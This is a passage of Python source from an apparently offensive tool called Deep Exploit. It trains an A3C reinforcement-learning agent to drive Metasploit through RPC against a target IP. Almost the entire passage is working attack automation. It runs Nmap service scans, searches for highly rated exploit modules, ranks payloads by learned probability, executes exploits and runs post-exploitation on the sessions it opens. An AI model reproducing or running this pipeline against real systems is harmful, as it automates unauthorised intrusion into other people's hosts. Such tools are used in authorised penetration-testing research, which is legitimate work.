        # Decide action using epsilon greedy.
        if frames >= EPS_STEPS:
            eps = EPS_END
        else:
            # Linearly interpolate
            eps = EPS_START + frames * (EPS_END - EPS_START) / EPS_STEPS

        if random.random() < eps:
            # Randomly select action.
            if len(available_action_list) != 0:
                return available_action_list[random.randint(0, len(available_action_list) - 1)], None, None
            else:
                return 'no payload', None, None
        else:
            s = np.array([s])
            p = self.brain.predict_p(s)

            # Select action according to probability p[0] (greedy).
            if len(available_action_list) != 0:
                prob = []
                for action in available_action_list:
                    prob.append([action, p[0][action]])
                prob.sort(key=lambda s: -s[1])
                return prob[0][0], prob[0][1], prob
            else:
                return 'no payload', p[0][len(p[0]) - 1], None

    # Push s,a,r,s considering advantage to LocalBrain.
    def advantage_push_local_brain(self, s, a, r, s_):
        def get_sample(memory, n):
            s, a, _, _ = memory[0]
            _, _, _, s_ = memory[n - 1]
            return s, a, self.R, s_

        # Create a_cats (one-hot encoding)
        a_cats = np.zeros(NUM_ACTIONS)
        a_cats[a] = 1
        self.memory.append((s, a_cats, r, s_))

        # Calculate R using previous time discounted total reward.
        self.R = (self.R + r * GAMMA_N) / GAMMA

        # Input experience considering advantage to LocalBrain.
        if s_ is None:
            while len(self.memory) > 0:
                n = len(self.memory)
                s, a, r, s_ = get_sample(self.memory, n)
                self.brain.train_push(s, a, r, s_)
                self.R = (self.R - self.memory[0][2]) / GAMMA
                self.memory.pop(0)

            self.R = 0

        if len(self.memory) >= N_STEP_RETURN:
            s, a, r, s_ = get_sample(self.memory, N_STEP_RETURN)
            self.brain.train_push(s, a, r, s_)
            self.R = self.R - self.memory[0][2]
            self.memory.pop(0)


# Environment.
class Environment:
    total_reward_vec = np.zeros(10)
    count_trial_each_thread = 0

    def __init__(self, name, thread_type, parameter_server, rhost):
        self.name = name
        self.thread_type = thread_type
        self.env = Metasploit(rhost)
        self.agent = Agent(name, parameter_server)

    def run(self, exploit_tree, target_tree):
        self.agent.brain.pull_parameter_server()  # Copy ParameterSever weight to LocalBrain
        global frames    # Total number of trial in total session.
        global isFinish  # Finishing of learning/testing flag.

        if self.thread_type == 'test':
            # Execute exploitation.
            session_list = []
            for port_num in com_port_list:
                execute_list = []
                target_info = {}
                module_list = target_tree[port_num]['exploit']
                for exploit in module_list:
                    target_list = exploit_tree[exploit[8:]]['target_list']
                    for target in target_list:
                        skip_flag, s, payload_list, target_info = self.env.get_state(exploit_tree,
                                                                                     target_tree,
                                                                                     port_num,
                                                                                     exploit,
                                                                                     target)
                        if skip_flag is False:
                            # Get available payload index.
                            available_actions = self.env.get_available_actions(payload_list)

                            # Decide action using epsilon greedy.
                            frames = EPS_STEPS
                            _, _, p_list = self.agent.act(s, available_actions)
                            # Append all payload probabilities.
                            if p_list is not None:
                                for prob in p_list:
                                    execute_list.append([prob[1], exploit, target, prob[0], target_info])
                        else:
                            continue

                # Execute action.
                execute_list.sort(key=lambda s: -s[0])
                for idx, exe_info in enumerate(execute_list):
                    # Execute exploit.
                    _, _, done, sess_info = self.env.execute_exploit(exe_info[3],
                                                                     self.name,
                                                                     self.thread_type,
                                                                     exe_info[2],
                                                                     exe_info[4],
                                                                     idx,
                                                                     exploit_tree)

                    # Store session information.
                    if len(sess_info) != 0:
                        session_list.append(sess_info)

                    # Change port number for next exploitation.
                    if done is True:
                        break

            # Execute post exploitation.
            for session in session_list:
                status = self.env.execute_post_exploit(session['id'], session['type'])

            isFinish = True
        else:
            # Execute learning.
            skip_flag, s, payload_list, target_list, target_info = self.env.reset_state(exploit_tree,
                                                                                        target_tree)

            # If product name is 'unknown', skip.
            if skip_flag is False:
                R = 0
                step = 0
                available_actions = self.env.get_available_actions(payload_list)
                while True:
                    # Decide action (randomly or epsilon greedy).
                    a, _, _ = self.agent.act(s, available_actions)
                    # Execute action.
                    s_, r, done, _ = self.env.execute_exploit(a,
                                                              self.name,
                                                              self.thread_type,
                                                              target_list,
                                                              target_info,
                                                              step,
                                                              exploit_tree,
                                                              frames)
                    step += 1

                    # If trial exceed maximum number of trials at current episode,
                    # finish trial at current episode.
                    if step > MAX_STEPS:
                        done = True

                    # Increment frame number.
                    frames += 1

                    # Push reward and experience considering advantage.to LocalBrain.
                    if a == 'no payload':
                        a = len(com_payload_list) - 1
                    self.agent.advantage_push_local_brain(s, a, r, s_)

                    s = s_
                    R += r
                    # Copy updating ParameterServer weight each Tmax.
                    if done or (step % Tmax == 0):
                        if not (isFinish) and self.thread_type is 'learning':
                            self.agent.brain.update_parameter_server()
                            self.agent.brain.pull_parameter_server()

                    if done:
                        # Discard the old total reward and keep the latest 10 pieces.
                        self.total_reward_vec = np.hstack((self.total_reward_vec[1:], step))
                        # Increment total trial number of thread.
                        self.count_trial_each_thread += 1
                        break

                # Output total number of trials, thread name, current reward to console.
                print('[*] Thread:' + self.name +
                      ', Trial num:' + str(self.count_trial_each_thread) +
                      ', Step:' + str(step) +
                      ', Avg step:' + str(self.total_reward_vec.mean()))

                # End of learning.
                if frames > MAX_TRAIN_NUM:
                    print('[*] Finish train:{0}'.format(self.name))
                    isFinish = True
                    print('[*] Stopping learning...')
                    time.sleep(30.0)
                    # Push params of thread to ParameterServer.
                    self.agent.brain.push_parameter_server()


# WorkerThread
class Worker_thread:
    def __init__(self, thread_name, thread_type, parameter_server, rhost):
        self.environment = Environment(thread_name, thread_type, parameter_server, rhost)
        self.thread_name = thread_name
        self.thread_type = thread_type

    # Execute learning or testing.
    def run(self, exploit_tree, target_tree, saver=None, train_path=None):
        print('[+] Executing start: {0}'.format(self.thread_name))
        while True:
            if self.thread_type == 'learning':
                # Execute learning thread.
                self.environment.run(exploit_tree, target_tree)

                # Stop learning thread.
                if isFinish:
                    print('[*] Finish train..')
                    time.sleep(3.0)

                    # Save learned weights.
                    print('[*] Save learned data.')
                    saver.save(SESS, train_path)

                    # Disconnection RPC Server.
                    self.environment.env.client.termination(self.environment.env.console_id)
            else:
                # Execute testing thread.
                self.environment.run(exploit_tree, target_tree)

                # Stop testing thread.
                if isFinish:
                    print('[*] Finish test.')
                    # time.sleep(3.0)
                    break


NUM_STATES = 0
NUM_ACTIONS = 0
NONE_STATE = None


# Show initial banner.
def show_banner(delay_time=2.0):
    banner = """
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     　　　　　██████╗ ███████╗███████╗██████╗                      
　     　　　　██╔══██╗██╔════╝██╔════╝██╔══██╗                     
　     　　　　██║  ██║█████╗  █████╗  ██████╔╝                     
　     　　　　██║  ██║██╔══╝  ██╔══╝  ██╔═══╝                      
　     　　　　██████╔╝███████╗███████╗██║                          
　　     　　　╚═════╝ ╚══════╝╚══════╝╚═╝                          

     ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
     ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
     █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║   
     ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║   
     ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║   
     ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝    (beta)
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    """
    print(banner)
    time.sleep(delay_time)


# Create exploit tree.
def get_exploit_tree(env):
    print('[+] Get exploit tree.')
    exploit_tree = {}
    if os.path.exists(os.path.join(env.data_path, 'exploit_tree.json')) is False:
        for idx, exploit in enumerate(com_exploit_list):
            temp_target_tree = {'targets': []}
            temp_tree = {}
            # Set exploit module.
            use_cmd = 'use exploit/' + exploit + '\n'
            _ = env.client.send_command(env.console_id, use_cmd, False)

            # Get target.
            show_cmd = 'show targets\n'
            target_info = ''
            time_count = 0
            while True:
                ret = env.client.send_command(env.console_id, show_cmd, False)
                target_info = ret.get(b'data').decode('utf-8')
                if 'Exploit targets' in target_info:
                    break
                if time_count == 5:
                    print('[*] Timeout: {0}'.format(show_cmd))
                    print('[*] No exist Targets.')
                    break
                time.sleep(1.0)
                time_count += 1
            target_list = env.cutting_strings(r'\s*([0-9]{1,3}) .*[a-z|A-Z|0-9].*[\r\n]', target_info)
            for target in target_list:
                # Get payload list.
                payload_list = env.client.get_target_compatible_payload_list(exploit, int(target))
                temp_tree[target] = payload_list

            # Get options.
            options = env.client.get_module_options('exploit', exploit)
            key_list = options.keys()
            option = {}
            for key in key_list:
                sub_option = {}
                sub_key_list = options[key].keys()
                for sub_key in sub_key_list:
                    if isinstance(options[key][sub_key], list):
                        end_option = []
                        for end_key in options[key][sub_key]:
                            end_option.append(end_key.decode('utf-8'))
                        sub_option[sub_key.decode('utf-8')] = end_option
                    else:
                        end_option = {}
                        if isinstance(options[key][sub_key], bytes):
                            sub_option[sub_key.decode('utf-8')] = options[key][sub_key].decode('utf-8')
                        else:
                            sub_option[sub_key.decode('utf-8')] = options[key][sub_key]

                # User specify.
                sub_option['user_specify'] = ""
                option[key.decode('utf-8')] = sub_option

            # Add payloads and targets to exploit tree.
            temp_target_tree['target_list'] = target_list
            temp_target_tree['targets'] = temp_tree
            temp_target_tree['options'] = option
            exploit_tree[exploit] = temp_target_tree
            # Output processing status to console.
            print('[*] {0}/{1} exploit:{2}, targets:{3}'.format(str(idx + 1),
                                                                len(com_exploit_list),
                                                                exploit,
                                                                len(target_list)))

        # Save exploit tree to local file.
        fout = codecs.open(os.path.join(env.data_path, 'exploit_tree.json'), 'w', 'utf-8')
        json.dump(exploit_tree, fout, indent=4)
        fout.close()
        print('[*] Saved exploit tree.')
    else:
        # Get exploit tree from local file.
        local_file = os.path.join(env.data_path, 'exploit_tree.json')
        print('[*] Loading exploit tree from local file: ' + local_file)
        fin = codecs.open(local_file, 'r', 'utf-8')
        exploit_tree = json.load(fin)
        fin.close()
    return exploit_tree


# Get target host information.
def get_target_info(env, rhost, proto_list, port_info):
    print('[+] Get target info.')
    target_tree = {'rhost': rhost}
    if os.path.exists(os.path.join(env.data_path, 'target_info_' + rhost + '.json')) is False:
        for port_idx, port_num in enumerate(com_port_list):
            temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'exploit': []}

            # Get product name.
            service_name = 'unknown'
            for (idx, service) in enumerate(env.service_list):
                if service in port_info[port_idx].lower():
                    service_name = service
                    break
            temp_tree['prod_name'] = service_name

            # Get product version.
            # idx=1 2.3.4, idx=2 4.7p1, idx=3 1.0.1f, idx4 2.0 or v1.3 idx5 3.X
            regex_list = [r'.*\s(\d{1,3}\.\d{1,3}\.\d{1,3}).*',
                          r'.*\s[a-z]?(\d{1,3}\.\d{1,3}[a-z]\d{1,3}).*',
                          r'.*\s[\w]?(\d{1,3}\.\d{1,3}\.\d[a-z]{1,3}).*',
                          r'.*\s[a-z]?(\d\.\d).*',
                          r'.*\s(\d\.[xX|\*]).*']
            version = 0.0
            output_version = 0.0
            for (idx, regex) in enumerate(regex_list):
                version_raw = env.cutting_strings(regex, port_info[port_idx])
                if len(version_raw) == 0:
                    continue
                if idx == 0:
                    index = version_raw[0].rfind('.')
                    version = version_raw[0][:index] + version_raw[0][index + 1:]
                    output_version = version_raw[0]
                    break
                elif idx == 1:
                    index = re.search(r'[a-z]', version_raw[0]).start()
                    version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:]
                    output_version = version_raw[0]
                    break
                elif idx == 2:
                    index = re.search(r'[a-z]', version_raw[0]).start()
                    version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:]
                    index = version.rfind('.')
                    version = version_raw[0][:index] + version_raw[0][index:]
                    output_version = version_raw[0]
                    break
                elif idx == 3:
                    version = env.cutting_strings(r'[a-z]?(\d\.\d)', version_raw[0])
                    version = version[0]
                    output_version = version_raw[0]
                    break
                elif idx == 4:
                    version = version_raw[0].replace('X', '0').replace('x', '0').replace('*', '0')
                    version = version[0]
                    output_version = version_raw[0]
            temp_tree['version'] = float(version)

            # Get protocol type.
            temp_tree['protocol'] = proto_list[port_idx]

            # Get exploit module.
            module_list = []
            raw_module_info = ''
            idx = 0
            search_cmd = 'search name:' + service_name + ' type:exploit app:server\n'
            ret = env.client.send_command(env.console_id, search_cmd, False, 1.0)
            raw_module_info = ret.get(b'data').decode('utf-8')
            module_list = env.cutting_strings(r'(exploit/.*)', raw_module_info)
            if service_name != 'unknown' and len(module_list) == 0:
                continue
            for exploit in module_list:
                raw_exploit_info = exploit.split(' ')
                exploit_info = list(filter(lambda s: s != '', raw_exploit_info))
                if exploit_info[2] in {'excellent', 'great', 'good'}:
                    temp_tree['exploit'].append(exploit_info[0])
            target_tree[port_num] = temp_tree

            # Output processing status to console.
            print('[*] Analyzing port {0}/{1}, {2}/{3}, '
                  'Available exploit modules:{4}'.format(port_num,
                                                         temp_tree['protocol'],
                                                         temp_tree['prod_name'],
                                                         output_version,
                                                         len(temp_tree['exploit'])))

        # Save target host information to local file.
        fout = codecs.open(os.path.join(env.data_path, 'target_info_' + rhost + '.json'), 'w', 'utf-8')
        json.dump(target_tree, fout, indent=4)
        fout.close()
        print('[*] Saved target tree.')
    else:
        # Get target host information from local file.
        saved_file = os.path.join(env.data_path, 'target_info_' + rhost + '.json')
        print('[*] Loading target tree from local file: {0}'.format(saved_file))
        fin = codecs.open(saved_file, 'r', 'utf-8')
        target_tree = json.load(fin)
        fin.close()

    return target_tree


# Get target host information for indicate port number.
def get_target_info_indicate(env, rhost, proto_list, port_info, port=None, prod_name=None):
    print('[+] Get target info for indicate port number.')
    target_tree = {'origin_port': port}

    # Update "com_port_list".
    com_port_list = []
    for prod in prod_name.split('@'):
        temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'exploit': []}
        virtual_port = str(np.random.randint(999999999))
        com_port_list.append(virtual_port)

        # Get product name.
        service_name = 'unknown'
        for (idx, service) in enumerate(env.service_list):
            if service == prod.lower():
                service_name = service
                break
        temp_tree['prod_name'] = service_name

        # Get product version.
        temp_tree['version'] = float(0.0)

        # Get protocol type.
        temp_tree['protocol'] = 'tcp'

        # Get exploit module.
        module_list = []
        raw_module_info = ''
        idx = 0
        search_cmd = 'search name:' + service_name + ' type:exploit app:server\n'
        ret = env.client.send_command(env.console_id, search_cmd, False, 1.0)
        raw_module_info = ret.get(b'data').decode('utf-8')
        module_list = env.cutting_strings(r'(exploit/.*)', raw_module_info)
        if service_name != 'unknown' and len(module_list) == 0:
            continue
        for exploit in module_list:
            raw_exploit_info = exploit.split(' ')
            exploit_info = list(filter(lambda s: s != '', raw_exploit_info))
            if exploit_info[2] in {'excellent', 'great', 'good'}:
                temp_tree['exploit'].append(exploit_info[0])
        target_tree[virtual_port] = temp_tree

        # Output processing status to console.
        print('[*] Analyzing port {0}/{1}, {2}, '
              'Available exploit modules:{3}'.format(port,
                                                     temp_tree['protocol'],
                                                     temp_tree['prod_name'],
                                                     len(temp_tree['exploit'])))

    # Save target host information to local file.
    with codecs.open(os.path.join(env.data_path, 'target_info_indicate_' + rhost + '.json'), 'w', 'utf-8') as fout:
        json.dump(target_tree, fout, indent=4)

    return target_tree, com_port_list


# Check IP address format.
def is_valid_ip(arg):
    try:
        ipaddress.ip_address(arg)
        return True
    except ValueError:
        return False


# Define command option.
__doc__ = """{f}
Usage:
    {f} (-t <ip_addr> | --target <ip_addr>) (-m <mode> | --mode <mode>) [(-p <port> | --port <port>)] [(-s <product> | --service <product>)]
    {f} -h | --help

Options:
    -t --target   Require  : IP address of target server.
    -m --mode     Require  : Execution mode "train/test".
    -p --port     Optional : Indicate port number of target server.
    -s --service  Optional : Indicate product name of target server.
    -h --help     Optional : Show this screen and exit.
""".format(f=__file__)


# Parse command arguments.
def command_parse():
    args = docopt(__doc__)
    ip_addr = args['<ip_addr>']
    mode = args['<mode>']
    port = args['<port>']
    service = args['<product>']
    return ip_addr, mode, port, service


# Check parameter values.
def check_port_value(port=None, service=None):
    if port is not None:
        if port.isdigit() is False:
            print('[*] Invalid port number: {0}'.format(port))
            return False
        elif (int(port) < 1) or (int(port) > 65535):
            print('[*] Invalid port number: {0}'.format(port))
            return False
        elif port not in com_port_list:
            print('[*] Not open port number: {0}'.format(port))
            return False
        elif service is None:
            print('[*] Invalid service name: {0}'.format(str(service)))
            return False
        elif type(service) == 'int':
            print('[*] Invalid service name: {0}'.format(str(service)))
            return False
        else:
            return True
    else:
        return False


# Common list of all threads.
com_port_list = []
com_exploit_list = []
com_payload_list = []
com_indicate_flag = False

if __name__ == '__main__':
    # Get command arguments.
    rhost, mode, port, service = command_parse()
    if is_valid_ip(rhost) is False:
        print('[*] Invalid IP address: {0}'.format(rhost))
        exit(1)
    if mode not in ['train', 'test']:
        print('[*] Invalid mode: {0}'.format(mode))
        exit(1)

    # Show initial banner.
    show_banner(0.1)

    # Initialization of Metasploit.
    env = Metasploit(rhost)
    NUM_STATES = len(env.state)  # State (s) of Deep Exploit.
    env.execute_nmap()  # Execute Nmap.
    com_port_list, proto_list, info_list = env.get_port_list()  # Get port list.
    com_exploit_list = env.get_exploit_list()  # Get exploit list.
    com_payload_list = env.get_payload_list()  # Get payload list.
    com_payload_list.append('no payload')  # Add 'no payload' to payload list.

    # Create exploit tree.
    exploit_tree = get_exploit_tree(env)

    # Create target host information.
    com_indicate_flag = check_port_value(port, service)
    if com_indicate_flag:
        target_tree, com_port_list = get_target_info_indicate(env, rhost, proto_list, info_list, port, service)
    else:
        target_tree = get_target_info(env, rhost, proto_list, info_list)

    # Initialization of global option.
    TRAIN_WORKERS = env.train_worker_num
    TEST_WORKER = env.test_worker_num
    MAX_STEPS = env.train_max_steps
    MAX_TRAIN_NUM = env.train_max_num
    Tmax = env.train_tmax

    env.client.termination(env.console_id)  # Disconnect common MSFconsole.
    NUM_ACTIONS = len(com_payload_list)  # Set action number.
    NONE_STATE = np.zeros(NUM_STATES)  # Initializa state (s).

    # Define global variable, start TensorFlow session.
    frames = 0  # All trial number of all threads.
    isFinish = False  # Finishing learning/testing flag.
    SESS = tf.Session()  # Start TensorFlow session.

    with tf.device("/cpu:0"):
        parameter_server = ParameterServer()
        threads = []

        if mode == 'train':
            # Create learning thread.
            for idx in range(TRAIN_WORKERS):
                thread_name = 'local_thread' + str(idx + 1)
                threads.append(Worker_thread(thread_name=thread_name,
                                             thread_type="learning",
                                             parameter_server=parameter_server,
                                             rhost=rhost))
        else:
            # Create testing thread.
            for idx in range(TEST_WORKER):
                thread_name = 'local_thread1'
                threads.append(Worker_thread(thread_name=thread_name,
                                             thread_type="test",
                                             parameter_server=parameter_server,
                                             rhost=rhost))

    # Define saver.
    saver = tf.train.Saver()

    # Execute TensorFlow with multi-thread.
    COORD = tf.train.Coordinator()  # Prepare of TensorFlow with multi-thread.
    SESS.run(tf.global_variables_initializer())  # Initialize variable.

    running_threads = []
    if mode == 'train':
        # Load past learned data.
        if os.path.exists(env.save_file) is True:
            # Restore learned model from local file.
            print('[*] Restore learned data.')
            saver.restore(SESS, env.save_file)

        # Execute learning.
        for worker in threads:
            job = lambda: worker.run(exploit_tree, target_tree, saver, env.save_file)
            t = threading.Thread(target=job)
            t.start()
    else:
        # Execute testing.
        # Restore learned model from local file.
        print('[*] Restore learned data.')
        saver.restore(SESS, env.save_file)
        for worker in threads:
            job = lambda: worker.run(exploit_tree, target_tree)
            t = threading.Thread(target=job)
            t.start()
